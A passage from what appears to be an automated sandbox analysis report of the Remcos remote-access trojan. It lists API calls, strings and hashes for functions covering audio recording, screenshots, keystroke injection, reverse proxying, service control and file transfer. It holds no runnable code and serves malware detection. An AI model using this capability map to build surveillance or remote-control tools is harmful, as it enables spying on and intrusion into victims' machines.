                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: eb6abd722e0cae9a5b5ac2f6fd433bf2c3c2a2b9123b5e78852541010ca8cce1
                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                  • Opcode Fuzzy Hash: eb6abd722e0cae9a5b5ac2f6fd433bf2c3c2a2b9123b5e78852541010ca8cce1
                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                  Function 0041A045 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                  • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                  • API String ID: 489098229-3790400642
                                                                                                  • Opcode ID: 1e9a3ea07f3ba9663f53871a1ba899d2c1a6c9113445fefd5f34cae6c74d1812
                                                                                                  • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                  • Opcode Fuzzy Hash: 1e9a3ea07f3ba9663f53871a1ba899d2c1a6c9113445fefd5f34cae6c74d1812
                                                                                                  • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                  Function 0040A761 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                  • String ID: HSG$HSG
                                                                                                  • API String ID: 3795512280-2729845973
                                                                                                  • Opcode ID: 66f46599578da9462cfc73df4298f3e368e9e17d46714e4cb5b61a7eab0f7c39
                                                                                                  • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                  • Opcode Fuzzy Hash: 66f46599578da9462cfc73df4298f3e368e9e17d46714e4cb5b61a7eab0f7c39
                                                                                                  • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E
                                                                                                  Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DecodePointer
                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                  • Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                  • Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
                                                                                                  • Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                  • Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
                                                                                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                  • Opcode ID: 37aa6dfc11f6c23b61123195fd4bee991378c13dd1bcd511b3cf646397b8e908
                                                                                                  • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                  • Opcode Fuzzy Hash: 37aa6dfc11f6c23b61123195fd4bee991378c13dd1bcd511b3cf646397b8e908
                                                                                                  • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                  • String ID: <kG$@kG
                                                                                                  • API String ID: 3815856325-1261746286
                                                                                                  • Opcode ID: a775fd09b9bd59cd8d1293661eff86217fedb4cdc6fe336e067938c0c3205025
                                                                                                  • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                  • Opcode Fuzzy Hash: a775fd09b9bd59cd8d1293661eff86217fedb4cdc6fe336e067938c0c3205025
                                                                                                  • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                  • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                  • String ID: Remcos
                                                                                                  • API String ID: 1970332568-165870891
                                                                                                  • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                  • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                  • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                  • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                  • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                  Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 201697637-0
                                                                                                  • Opcode ID: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                  • Opcode Fuzzy Hash: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                  Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                  • String ID: C
                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                  • Opcode ID: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                  • Opcode Fuzzy Hash: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: tcp$udp
                                                                                                  • API String ID: 0-3725065008
                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                  Function 00411530 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Eventinet_ntoa
                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                  • API String ID: 3578746661-168337528
                                                                                                  • Opcode ID: fe6851d6931ead13ffaa35775463c49c182512345669b2b1eae2850f81e7a572
                                                                                                  • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                                                                  • Opcode Fuzzy Hash: fe6851d6931ead13ffaa35775463c49c182512345669b2b1eae2850f81e7a572
                                                                                                  • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                                                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,00404C49,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404BA5
                                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                  • String ID: .part
                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                  • Opcode ID: e7cafca0780e8310386d8ce0e2b4e9b02ff549ab184a3408e64b8b6c6c25ff2e
                                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                  • Opcode Fuzzy Hash: e7cafca0780e8310386d8ce0e2b4e9b02ff549ab184a3408e64b8b6c6c25ff2e
                                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                  Function 00401B8F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _strftime.LIBCMT ref: 00401BD4
                                                                                                    • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                                                                  • API String ID: 3809562944-3627046146
                                                                                                  • Opcode ID: 210fd9ba1251f706d0f6ced8dacb23af96e0d20cc0fe8c7829aa69d3c0beebe0
                                                                                                  • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                                                                  • Opcode Fuzzy Hash: 210fd9ba1251f706d0f6ced8dacb23af96e0d20cc0fe8c7829aa69d3c0beebe0
                                                                                                  • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                                                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InputSend$Virtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1167301434-0
                                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                  Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                  • String ID: a/p$am/pm$h{D
                                                                                                  • API String ID: 2936374016-2303565833
                                                                                                  • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                  • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                  Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                  • _free.LIBCMT ref: 00444ED8
